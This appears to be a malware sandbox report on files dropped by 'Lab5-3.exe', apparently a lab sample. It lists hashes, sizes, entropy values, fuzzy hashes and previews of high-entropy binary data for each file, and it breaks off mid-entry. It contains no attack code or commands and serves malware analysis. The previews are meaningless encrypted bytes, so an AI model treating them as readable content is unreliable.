                                                                                                          MD5:6B78F17ECA613A06D60FE67D5DD35BFA
                                                                                                          SHA1:783454C44DA8917C6DA5F395125653637B9C144E
                                                                                                          SHA-256:4D7A0E26EE331E9663F2BECAC29492E37EE454C7009139A445A64240ADCE2887
                                                                                                          SHA-512:CEA2F6AB1323DA67AC6B790B6C9E10882DB36F47AE8EE2BF132FD2A619368121D9EBD8B86B962617AB7CBF2D19AAEB73C950F911A61BC74541746CE53249A833
                                                                                                          Malicious:false
                                                                                                          Preview:!..f.....D...U.%4{.^:25V...E.\.........t..7.>...'6......O..4...[...."Yd..I:...SDg.^W..../P..op,E..Z./.(Q.. ....q.....ann.[c'.....B....t..~D.....d...q.\y>Z.........k.@..........;-../t...n.7.T......P.......Sb...8.....-..@Y./\.G89..a.e:A.+*.u.;.u..0.....$..\.;.~A.l.Y../.vO%...IHZ..l.\R2..6......9..cg-n-....j.J..|f..J..c79.s:...+.9xTM..a4T.......I.wF.JB6x@...fH.hVH]=.1.9...}......N.<.....\.2l!..-O.TJ..Dv..mL.U..#.........J..9.$...p..n.>.... ...^.t.R....~...LS._:.............1..."....F...K.WG.%1P...V.q.@.EY...2.v.~UwEJ...o...].8.J.yiBr.n.r+.*..1>..,".).U..c..r.4....u..8..Q...?...k...T....j|D.E....w..}G.O.-...T....:.[.....k.0...0.d..U?...G>&...v.h{.C..2zu....G....u..GX.)r..]...d......n..<...bo......E./..0.;p.}&.......a......2<m.D..m.06....&.1k..M~X.Dg..vX..l.@_~.....u~..D.tN..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2208
                                                                                                          Entropy (8bit):7.920184699268331
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:X6UqqANgywB6HGyp/HfUTid3hBaUoSGFcmeykEdEElU92i:X6pqUBmWEGx0uKeY2ElUJ
                                                                                                          MD5:2FAD39624147878F46C6E0589C6A6FBA
                                                                                                          SHA1:09BED478427BF97112307BD9BD68247BE65413F3
                                                                                                          SHA-256:4D465580354256862470F89EF3F82D229539567321164A3607F79D7398ADE36B
                                                                                                          SHA-512:DAD2F9E8085FAF2E00D153CB9963E106F2EA26EA120846D2E2815493BAE6087592430A6E920894C1B7F58C01631105AAA0CBA8AE302CF24143393F762BC35283
                                                                                                          Malicious:false
                                                                                                          Preview:........@../...r..q]'A)...V.a..Y.. .......!xX...L..8p..D;...!v...H.@N..#+E8-......hPz.....n..i..'...(...fuwK..=..N...\..V..d....m+._......,{....x..b5!.t..H..bw...S.8....K427............~.y.i.........*=]i.g==...O........%Ut@.OZ.C....R...$........./.3.....R.G.c}R....&.|...K..{.%).l.9z._"6.......)?.!..B....f.,.*..|e...E.H....&...cq.&S.~...L`F.i...'.m.{f.>K..M+.v...c".....Z..4.dQm2.M4.K+^..N.7....|xjH.......Ae..o....0}.S/*.2....X.1m......(.U.p...7....Ng...w.:.=5.x..!)..Q..A...%.z...0[1.j.WILS=[.+Q.....(.k&..\.^.s>..s...Nr...=..w9+......R3........M..$./Ou.y...z..4P.t(.....6....j.......j...fruf..r.#.l.A.5.a"....I......u...I.....t.*h..M.>.cB.;.s..Q..G.6(.[.pem....B......T..))...Yp.F.Z&8.[.1W..OC...4...^.O..%.....+n...T..uT.s.6,.z..\.}.TXZ.Dn,o;Jq....L|.9.,......T.KqtBV....-...+8X.+8..z.d.F.$.|L....`...../w,.?...d2.]&.(..g......h.f..n`.......dh.:...C$\@..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.9232753309779635
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IErTO4P18rC5s9XAsRHfUTid3hBaUoSGFcmeykEdEElU92i:xrao18rC5sSGx0uKeY2ElUJ
                                                                                                          MD5:2C2874EE2F6A235A721CB53D1D86D21A
                                                                                                          SHA1:D3A4CD3B101154375C458D3BF1D335F682FF9737
                                                                                                          SHA-256:795A6939A8160EBDBC0AB5FC29762586B93F594C3F70B161D9C5BC802DC81373
                                                                                                          SHA-512:9781F38744BE172F3AAFDA51B3879624CEEB1FE3C7E2DEECA5F4317DD985F588C6109929082FD52B99BF1F458A85BB2EB55013DA3E24BC82D5B8BC3AB24BBBCF
                                                                                                          Malicious:false
                                                                                                          Preview:...^Z..<.`........[(C(.D..I`..V.L...{..P.U..nV`'..N.....p.-WA9|...N.!..;6........p...].d.*..K.M.."..I]q..........."._.J)!..nf...}.S.....Z.\...}{.y.7V0..9C^w....j...U.$..Ak.Mr.M.U.S.r.......l./?~....|..."...m1e...|....~.S..".l......q...P]...u...$.R4t.s.0.z..B.#.[&..0uY..j..).,.9..F...~......!T.B....WJ.[;Vw..C.fh.......5i`oJl!...l:..................$.$.D.Sj.s..+...&...qg...W_.<.TY9a>...P....%.p.....[V.I.'...=."..>f...@J......E.......A.P3.=...O.s.....(..=g.m...+^.b;..W.`P..A..s....6.n...>Z..q-..TtQ.;.....tc.'(hd....M...i=L..%%..n...XF[.V.?&.uW'.....l.B.....Ak.....]...?..!..f*;.u..w..q.O{..>'....V.O.~.+..?.....o...pe.......).....|Q\.O.X......r...T.'.`..*.....Emf.....afZ.....5j...y..XPh.)....\...,..k....W.3B....D/.....*...U..o...9.l..t..F.B.q.1.e0"t.z.6]..A..9/...^......O.....z%...d.2L...E.d....bC.-O.........[.....[LY. .!.4..e`...n......%...v|G.>oaW..o.7.C..~.@u..G...W..Un.3....U.@.."I..6.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2368
                                                                                                          Entropy (8bit):7.930602997412558
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:hzGkt5exvvCDcMTQLg7NifHfUTid3hBaUoSGFcmeykEdEElU92i:hV58vaY2v7NlGx0uKeY2ElUJ
                                                                                                          MD5:39A6A0FDA5CA034F5C986779FB859D35
                                                                                                          SHA1:E49003911C69437B42A38FD48F55D3E8ED6226D7
                                                                                                          SHA-256:AF241B2308237D3AA9311563C8B20DACE5721232D44E775B2C3DCD6FEB248779
                                                                                                          SHA-512:C8619CC6DFED2ABB6DF0999C795BB8A03333B013DFAF1774A25ED5989F0A5FCE325B20AD72582B58695214D2BEB7956D76E801A25D8E07596FA3AEDFB5959BE0
                                                                                                          Malicious:false
                                                                                                          Preview:M.....:E.*..X$.f..2. Y.........Z.t.b.;(.X.1@..Fq0yC....J.x......`.-SMK........}RD.-&;X..I...>*L.8.;..........TzJ&.../+.$.#...Z.......F.u...fX.A9._k.U......0....\.XzI1.....^.........@..Y}.U.(.TSy.Wy....9...0F...=O....l.r..8.mP,.".=LQN.;..~.g.M..fZ.o...>.0F.e.MmT.-.....G.w.B..63.....F....j.`w..{...........n...Dz.%.A..q<;...7..!.wg6.dB......d..v. T&..~...&M..w.&......'.z]...%.j..........."...6.&..........{N.....?!.......*+..y.^.z.:.6...$.9.....2......t.'...p..[....u...L...d:.i...../.#..N....~.#X.<-_2..#.....b.O....}........Q.m..!.{.Z0..K..xX=..1........n..Rj..."./Vl...}y..E/..K.et..%n.......'.0.M..b.._....`.........hY...A....L..!.V2o(.....<5.}..h].T(}.G.Sv|..r.mS:~..].....W...v.0....B.....2.......y.S....k..uS[+7.y..(m.a.D....=3.e..d.m......Y4....l=.?.x..`(*....k.8UA.M ..).K.-.y...........!.D7...g..LA.s.h.H.....a...w.........\H4.......c~.Qa.4..z%....L.!..@......j..2s!....h.....t.f{.Bv......i.d......T...6m.s.'3..z..$q..........q.5.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2192
                                                                                                          Entropy (8bit):7.920508516646863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:G0erv92B8pgBmT4XHfUTid3hBaUoSGFcmeykEdEElU92i:GDrvTqeJGx0uKeY2ElUJ
                                                                                                          MD5:5E1E4160994469F50926749C65A7E7AF
                                                                                                          SHA1:4E1BC37F0C221496E938C26CA55C61E7B1C0ED7D
                                                                                                          SHA-256:05E2A6CCD1022E1218DF6FE1EA676A3C36BF7DE17FCE690BC3F49A88437466B6
                                                                                                          SHA-512:712A7D9A8B4C01B16957FA04B678CF01E5310777E60203D2293D91FC20094568C101879FB4CF16758285F30F6C6D2D540B2F8F6B04172F7013C5683576A04963
                                                                                                          Malicious:false
                                                                                                          Preview:..0v[-4.;.gW...B\..A.~...+.......J.?u...Jpe.uog6L.........~...._.&....l...)*.....i.....AH.m.u.k...]Ha| .....Q.=.7i..A.ErY.[,O[.y%..HJ......z.k...9.....,.D.8.$.B..k._.w....3........6....Fy\.&.......\.G.2....vLvi..j.............>.Z).?K.w.g`.X.".L....8^Z.b.R.2...f...zg.=#i..a.G.%.znp..V..\x....W....W...<]`q...<..F.F..j..44.g...k...p.9o.8_.N.L.^...l.)..A>.i.......w(.ZW......^O..~V.M._.*..9E.W.....}u......ks.....G.54...o....G..:..F.?.\U..@m.6$B..8.T?k..."V_......>....4..}a.O......4y..FV}.s........&8.*.W..w..jZ;i..y8.@.Q..B.7........Ne8.2(jb#. ......./.ax.*.n..t.)..I.eN.:\ui...........W.v....z.u..@..6..+-....4q.V.J.2..gB%1d.0.~.A.K2G_vN.g.....1..~bB.*m...].LM.r....>Y.m..C.K)o.E.H.....Q..g...h....\.nZS........O.lE..TO....../.1e$.h..u......<d=}..[O..X.....g...._G&....JN.....Q..b"..o..Z...[......M....T%.$..........RIA..!..'.2.k.Y&.C....WM,.S..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.H
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM, 0x8C-variant)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.914865207831464
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:N4MECdEazWtdX1JL6TLxcY11Y/O9HfUTid3hBaUoSGFcmeykEdEElU92i:N4MiaqtdX1p6TLxcY1O/OWGx0uKeY2E+
                                                                                                          MD5:ECE1461F0F54F2B2559672D59C75F163
                                                                                                          SHA1:686EBF1EFDA127586DCE2E55F133BB3D8BD97213
                                                                                                          SHA-256:AF539BF058DA256F21B8B7D69D12B955323C8CC04C8C51CA362B8148438AE3B5
                                                                                                          SHA-512:F434519E2312D700D5797FDF768CB9F98D1D79F9A0677216CAD4D90A5CABB31CEEDFF98B2BBD94658A0A36C9F4F70C8DA0C23F0544139D82498744DB086E65A2
                                                                                                          Malicious:false
                                                                                                          Preview:.P&......"...:y>.[..k...[.6.vT.<.c...Of=.p......q.wf.!I.|....P.......2{.._{..o&B...O.O.=i....Z6vk..?[..O.U.H....g..N...N.....I.."\...)... .C_^%(....] %.....qE.......S.!FV...,.&...[.ML....8o.H.D..........m...!.}.Gt...tC"..*.4......0..&..n;..OF^.(1.....=W..z.......p.Rx.#...n./R...%.x.....wh.......U...z...U..s#.....'...ir...)4.\.{w.........d.I..M...O.MI..m...,..{|=M.^}!p7.M......dI.m>.0F...t.....qOK....B8.....P.XZ........bd....QL.[.Ao..j..6.....O........M.}...>....z.)............)9...D.6&j...d..L...2.O..mw.0...<..s..rn.0m.. @.u...x..M...3...+@..y.s..0........:..z..rj..>SG...1.8.0:.4.q(.3..g..q.".....A.m:.C/.u..D1....Z...Y.....,...%...>.hX...T..9P.J#~..e.u.+)....dlq.s....."....I..f........!.")W.T..$..Tj.........b........};....0[.......6...P.!...:-..-..9....L.....$<8..}.........6*8.{.G2@<. ...@.i...6...`....-:.R....5cb... .3..f.2..7}....-.UQ.......E4.c'Xg...!..I...LM?.<..K|g.7....J@...ghn.Zc.....sf..^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2224
                                                                                                          Entropy (8bit):7.926120100730497
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:bJ0ScKm5b3O+jCHfUTid3hBaUoSGFcmeykEdEElU92i:ddmZLj9Gx0uKeY2ElUJ
                                                                                                          MD5:5C49BCC5AC9E34CB51388BEE04FA5B77
                                                                                                          SHA1:D2346B303A5FBD63D1DF9FB3649A945CBF855411
                                                                                                          SHA-256:EC675417747E6ED986D66DACA04745E8D4B102A4474610BF4186309EA0BF667E
                                                                                                          SHA-512:93D5E98AA0C9D3084BA7B0EF6A1F33E00D02B2C8569DBC1CD58BEE245A08EFAAECE3422AF5EDFFBB24A7F48C8C32EBFAC8C8BA2BEB9B260BD269F25B1A1987C4
                                                                                                          Malicious:false
                                                                                                          Preview:w.C!*....k....U.r.E....fR.I.r........%(..D.K.-....d....b~...H.Nu..[.h.w....+...4I..U......&T....9.8..ZZnc.yWu.5.;..._.i.o....R}F.A.GH.......a..}..M...{....63H........S....t_..Y...k..m....CC8.;......U}F.n|..0.e@..7...8R.N..w......f......h../.?....z.F7...5...^.9.IAO..4.c.t}o..h......).$1~.A.3[wE....C.OL..(..]......3.:......N....V..GP...).^.....S..)..2.M...^Cc]..H.j.v..!_..U..A^s..`V'.....k....8d.xh..~!..C...F?..!..s.......k&....".-.t.|Y.......+ZZ\S..L..D4.....c..(4.8W..Ap....C.e?....6....(&..P.....W...-k.6l+.......+m........;...YR...vI..6.J.>..E.....N...L.q.....7.-_<.\!#....-..|...I.O.@...Q?..U..G.[32.).;.....v,R#K..i.b.6.y.jF.eC..,.US..c...C..~...,1]z.z..Y.\.x!..$l....U...C.<\0m.Y...b.Tch%.."O.vVyF..q{..m)I.:..o.\}.y..{g.Z#..7........6.8_T......h..o...X.$.....P.JB..?....@..L4.?....*.-f.t.A.`x.ODP..s...K....@..c....z..`[.b0.g.....z.ig.Zv.OD.b....T4b.@3.|0N....n..n..m...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2400
                                                                                                          Entropy (8bit):7.923522767846664
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:biqJxzUKgYXkRT/BdyEoHjZHfUTid3hBaUoSGFcmeykEdEElU92i:bi6x1RE/D8HjaGx0uKeY2ElUJ
                                                                                                          MD5:5BF4690B23E8D54049E5B187DA36AA1E
                                                                                                          SHA1:9284635A8762E9759E7209EC54F480105EA3B9E8
                                                                                                          SHA-256:729216243506367CDE17C713DC3BBEFB38218C0D2699E92F79F9568B8FC21214
                                                                                                          SHA-512:A4A846971BC663D9F13B69CFD659238DAF7F665C06BA1C5538BA0C66E164E21AD7235A34B6D0F85D0C4A8F88607BDD02D02096AA655867967610A7D4C381EA04
                                                                                                          Malicious:false
                                                                                                          Preview:Y.G.8.........+..`S.....9O./.e.)R...-".,....v.N...>i..G....a...........E.bPh.....I...U..!..=..b.O.x.\u.s....x``Ow..6/......i..j...XW...Y..z-Zc............;....=..!.u ..]F.v;Q.:.}..XJrI+..^....|.H./R..G. ..p'.a.D.c...1..30.L....M..v..0.@.\r1I..h..yy..a....;.M.........dD........OT~F..H.*.7.3......E..m1..*..Vg,.{L.9.bv.e.M.......!~....X......*J.y.D...%<%...x.6K..U~..6....1...L..\.E(...e....).]..^kN._.Qc....z`o.....3..y.p....+...@.......".F.V.j.jUEX.b.'@....-...y!.........0.l......e..o3.....'.......z.$O....Z...q.d\6..m.a..J....]u0._.......0v..4@......UH.s!y<...IY..RvZUL{.4'...........q..?~...q.J&.h.ZbC...y.x.....W...tA.HT@._.....n..2..gH.l3UhAB..%.s...E..............D...(.M.S_.......KR.e.D.5Yo~.p..+ )+.f...;.l.gl......r<.....g..,2.:.}.$8#1.B.Z.J.8.t....../.j......J.n..F*.#..:. +&..N0...w>}2....9...C..`....L.(1.MK...........#.....'...}.K...>R.X..f.......Z...o.m.v......B......r/>%.`..?..8..D........o.W.....x.....'.q.?.."c.Y.......o..e.f..R
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2208
                                                                                                          Entropy (8bit):7.923983763129897
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:wkxUqM/kLTrZ4dsHfUTid3hBaUoSGFcmeykEdEElU92i:wkWL/kF4drGx0uKeY2ElUJ
                                                                                                          MD5:9277DB8D798B03BD6E47BBAACF18D677
                                                                                                          SHA1:3B4B42C5FF50723A0C887E0C3B58FEF4F69AFEB8
                                                                                                          SHA-256:F093F37EFED79DB170A0FA5F7BA69A4A6EA9BFE09C391D3A67F166EAB2AEC5C4
                                                                                                          SHA-512:63D4465D1FC5A7CF858832F23A893976C5DB7359F1BF0D2DEC9576342E75F4509E3950CE71FF1878F6FD7C34183306B9175A826530BA08DC789EDECB85FADD8D
                                                                                                          Malicious:false
                                                                                                          Preview:.....R.....?lS...A.^m9;..3.A..F.O.....Jo....W...(.#...!.Z..B+...!.......u.Q.4.+|."T..g.<6.0lj...f..h.x...W..........V{{..8G...g...-.!c.4k@T...QN....m...H.<...(..M.......D...!.6@.2.....F|...\;...8.u.....ZE...'5...../....<....R.0.$..T..Jg....U..A..,u...k....l.vR....[n..}2..R....,..fV..@.....O........_...4.....U.Q.?.....@...r....{.......N5G&...8.3...&....D...Zy..1...C*.4.......}./..U .d.....@..g..=..p.u....~....m.m..f.(..&..C..l6.eK.X..EWbX\...u].M[....0B.M..NJ.C....7=...6()..k.[\..."....q...P[...s. ..".GI.q.....|.0S'.9...r...dI|...V....Z.TZVlr....W."d"....6..E...R/....{N.h...c.......%..s.`.......u`.hn,..i.... ..!\[*......YM.Q..L..i.d..X.!..[7C\..5.0.i..........I.=.9..+'..6.P..Q...w=*kS.C..p.'F!zr.m.o2H........W7.Zs......44.\1..c..bn.+.._...u..snGH?.Nt........B.A5.A.".E..O/ !..i..f...2.@...N.i.F,Nl4x=R.V&1...A.......:.i..V.[.yZ....Z....s.........:....r...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.916437154289782
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:gw55lZdlwSiexuHfUTid3hBaUoSGFcmeykEdEElU92i:gw5BwmBGx0uKeY2ElUJ
                                                                                                          MD5:0CF9958DF60AC5251D0C8D7CAF2428BC
                                                                                                          SHA1:56345E5FA48DF37C8A9F66AFF939F04AE82DDD86
                                                                                                          SHA-256:C41BC88805F492FFC9BB7F85E928053B6AFEE0143783A37E03FF1A1197971962
                                                                                                          SHA-512:395A3733E77A7804F744A11B8CD38B567B629B7077BF308C05C6354CC6C6535436342A767FB15AC9E5A2AD7CB9311F9A63EA32614859BBD27D72C453533AC0B4
                                                                                                          Malicious:false
                                                                                                          Preview:..X8m.....:q... -...._.a...f.S....I~D...8.2..$c....aV...2.mH.\.H2.t...}P.*.J)..3....9.5.u.6>...-.....v6)0..eM^...i.#.-..<.Q...-Q.g.0)3R.>k(x.|.&........}..!..._^9.%...>..u_..i,..&..=..#"......F.....$.Tx.h....)%*L4I....>.dl5....A8..<$.@....n.2..1.u.S.3.....P..H>..].0)...Mb......)...mn..G....[..J.z.q|.`..iw.lr...i..cp..]..A..#%N....V#[.`[...........mE..$I.6...W.....I............Z{.o-..P..6...#b.lZ.....,$\%....+.......W....Om.0...i...\xV.j.P=.2..Y..a._.w-b .......Oz..rK...pkw. *..'_D....".....e.d...k.E.M.3...x.76eVB.x..$..q.1...e...@iO.F./.8..rE...H.?....y.\.."6.....`.7...~#K......9.8..u9...\j.'d....4....B8..]3..g...o....K..........|.T{3.).....i..Y.l[n/....0.*...Q P.E.}...Y...a..."..Rs....u..j}z..l0...7~../...qfg......o...%...>...2M.$....$Y+.g.?2...}mH.k.(L..To..2....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.906541713281906
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:OABHmxNb1f0fvN1JaUHs8kqHfUTid3hBaUoSGFcmeykEdEElU92i:tBHENRePMDFGx0uKeY2ElUJ
                                                                                                          MD5:4825EEA34AE997E55F6A7AC8EE82DBB4
                                                                                                          SHA1:BE47DE4227310F91BC6A4471FA5B1AFEAF03A6AD
                                                                                                          SHA-256:3604D066869B48EED699814B6877D587D284540CA488FBC7620740283ECCD632
                                                                                                          SHA-512:2885F661A3C9022D4CFAF507B67B8833BBF10CD79F7F39C5985EA219ACB569179E53091565D5D637238973641DA50A0B7AD7A388F81CF8D87ABD57265BF95A3D
                                                                                                          Malicious:false
                                                                                                          Preview:...p....5......q.I....}.[.t.....k............T..3.D/I=.q..hVs.+R]........kH.`..Q ..yo...{..1.7.wyt.r..Z.K...B...:.....-.J....80.....-.7.1...bGN.....41(...2.-.Hq1;E....m.m...+..s.(E....k.?.U;..y.`N.?c.g)f....&.f.c.?=..)./r7O....]{.8Y.F....Y.hC..2.........!>..\..u.....#kL....K....,.CMv..q....Ia..V....3.|....V.O..KA.J..L:...C...r.[..E'.....t59, ..fR0..1.<.........P.T..v.C.....U.fE..t&.I."y...V..bF.^..`.,.....;....ib.....q.@..W...n.c..../C$..[...Qs`i...Rq..L?M.n]..l..M.-..1......r...D.. ...oA..v...B..W+..4...q..D.....P.Z.z~3.BOk....W.....R..:.A.fe......|..f"z-.n..=cc..%-0..........RH....y...R|.~00X.....H...x.".._6o.....t.`..yIU...._'eJ....#M.$.8......w..;6#J1..tk%i..{c%....@...s......y.q.jH4%o....'F3..)h>..9.y".>.+.o.n.....y.5.N%?mz.fy.8qe.!.c0......4.%o.$.......p..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2208
                                                                                                          Entropy (8bit):7.924377958969493
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:g/+XtU04QJ5muGlVhRufTjzHfUTid3hBaUoSGFcmeykEdEElU92i:I+XtULQJ5muGlBeAGx0uKeY2ElUJ
                                                                                                          MD5:6ED4C26871E610D04150CC3232599B6A
                                                                                                          SHA1:B50C77DCA48B3B78553179271FA6BDF5D76E4878
                                                                                                          SHA-256:3E7A71F0C0840847C7B07ABEDDA758E5B12760F99A5D3905947BF16E113CF578
                                                                                                          SHA-512:E473C1592D72D6729738D008DD7DDD64F1C4AAB323E6CE97ADCAEAB11A7537CE6D4F91EB15D77FA0E8EBEDD356A2B54627A1121E92815A03C4C240F6406E4CB5
                                                                                                          Malicious:false
                                                                                                          Preview:.*..]W$..w.1..w..o<..6ol.......&..{..`.......K.:3....93'..3.&.]...Q.Z..=BY.:..Hk........J4.vl..A)..^..6...vfy..I....!....H..m.......n.;s`...@...A.*.ue.(..+m.B.O....|.....#-0.9.....UTgy7;....}J.%..S.i}.$.Z..m.."N...w8b.'........I..w(..&.......' .....=..5.C..ZV.u..+..w4...O....<>..~.p....Ou...9.....%.`.T..:.rA3.*6.#.ty...n.lM..&r.~...ul..!.......z.."gs2.`.9.7........o...Q......B.I/..h..6gN.2.vRyAD.......u..".....C. .at-...l@fd.7".v; ....U..?a.IJ}.9...$.z..*.....S...#..V..L1.N..O.......JVq...@&AF...Auk?o......<K1.}i#[....%?.....B?.?u.....2.R...W.Y..m.+.V....g..x.L........m.^.s...^.C..`9.B7l..|.a...........i3h..TR_iBA...6Nb.. t..c......I...iP...G.V.F8...G.e..C....i$$.i..-.N.9....t..Q..r.}!....W.2.>0R...Q....U]-.Kfk/..,..q..D5.....@...w..`..O...:x.o.X..O.....>h.@eh....}...Y..q..Y.^...y.t..#..8.Y.M.3..^..1H.}.$.+?...F.r-+nl...Q .`.%Mm6..Le.W.a..%....E........^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2960
                                                                                                          Entropy (8bit):7.934347522989579
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:llE1xeExkaTidBge6y6wN5bKo0Bhs3qAz60RkFAHfUTid3hBaUoSGFcmeykEdEE+:j+bxkTdehy6cj2hsDz60qFHGx0uKeY2b
                                                                                                          MD5:D9F820C09252D418D05BD2C2EB3243A8
                                                                                                          SHA1:23217E8700B8BBDF90D01F336A9F754A7F195608
                                                                                                          SHA-256:24637247CD68E75BB62943A1B83CC0360E14F0B75B83D381B9D31CE304CAAB43
                                                                                                          SHA-512:F2F4C4B9DF166F854331982FF47DDBAB7F5AEDECEE351BC1507C856997EF87DF37BAC7ABB0AD88BEEA348AFF8B8C6D4D92A3F7EBE1E4028B0E6B5506B951C3B2
                                                                                                          Malicious:false
                                                                                                          Preview:Je.:as6..\V...s..$..P.@..........}.A.....@..0S...).TV.9.M......5I$y.G. ...^7fo"......H.e..j.......1~.',0.K...X.I.]X.L....g..d$.....IqC>..{_?.......x6l..B+...Ry...o...F.^....*..i........On....d.ns.u.O..\.. ..Ml.*.Gv...Bi4...W....a.c.....w.*....nA6..q-O/....l..].m.._..p.).......~lC6.}{.),O.ch..B.= y....6.a.SV..%...2..Oz.S........y2.H.t.dM.....{UYyBlc....G.!....o.!...x,..........4.1+.s.c.d..![.2..I.j........qr.M...u.......M..D.J......C.a.z.)K.<.:....jOY<......a*.D.\.uS....!.......^..{.Rq+..l.p.R.|.5..cQ.....BY.2...Z.iY.j......Z.bi.)}g.....J.A.J.\.*...7.9..Y0.f..m'\.+...s..+..>.......o..........M.1..../.&.QX....H......#.<]qr|1.5d'...xX.B.L.13....U...V..{.D0....k.].IJ.._..<r(yu.g.U.......... 2....3C.v...?.cA.L.'.u.Rz.E.n.....p:.....\th.K.X...u.J............Q.@.G%z...._C...Yf.......]X^G.,.......c....D..]......`..|.K.v}../K..q..W?....t.!..\..;....Fs<.o-..1...Y..Y.......3........%.h..U.z.(......a..!..w.....7+...*.({a......."/o.-...!..c.O.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.928647979984294
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PLN75em6FwDi86Bncf7FwHfUTid3hBaUoSGFcmeykEdEElU92i:P5AwPgncf7F3Gx0uKeY2ElUJ
                                                                                                          MD5:8D14FBBC292B40AE5C88493CFF47B534
                                                                                                          SHA1:54648A9DD20DA0B4037E5CB0F3279A7D7B1608AB
                                                                                                          SHA-256:4DA0EFD979B9D8F36BF552C93107834C8E6B3566E17329DAA8745B38D97FB616
                                                                                                          SHA-512:35214CFA8DC6D004A697D6EFA71EBDB9F278A56BD12782F093C8AEF1A8CE403BFBC767C2C4C59981D1EF1B7EC852DF86DAECED093A040563A2094104B95B85FA
                                                                                                          Malicious:false
                                                                                                          Preview:vR........}..|.B..g.T....Ai.x..X.U..e...-. ....F...g.g.Q.^2...Y.....P..@......q:Cl[l.4U\W.jX.&....i..d.@.k{ ]xiTS...`..!.UK..........9..),...*f.X.#.Z....MTe"..c.[.......q..4R...y\.I....bh.:...!...4WP:"..]...:Fg..(...... ....p.^Jr...S...V.Dl..)%....P.v.>.....E.M...:2;#2..>...~..U..N.rY..*.`3.....$$.?X.$7..].L`.......q.e..5...Y7..7.m|.x..K.....{..3Ry.)..FD.....U..;.^7C.Lc.!^..3O..~Q....}.(.3....|C...\.I...m......#.DjE..G...].i...7$R.[..o.a\w....^....%...2~X@&A^;P}..R...$m`....@...{.p.......2..B`.P.....]j.v...a.f.g..EsvEVW.'.....m.[......R.4.%...B..$}..E..|..1A...(.Y)^.pS.5G.ZKl....M....\y#....X..|K^....x.2..P:Efw..f.>.\..f.].y..('...o.L...n........._.X..Q....[. $.{|.&.g..De....S~6I...!.r@.9.....^...){)..h.9.H......&..u..J-......T.......$.5.`v..\...39M......1...w.'V.@.$'g.%...]..(0..4.....8~...9...#....y..`l. ......jK.r.~w.#..@..#..8..VH...........3....s.....t.M...?iC..+.:.,.,4_.)..M.....w...r......^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2320
                                                                                                          Entropy (8bit):7.935601225320371
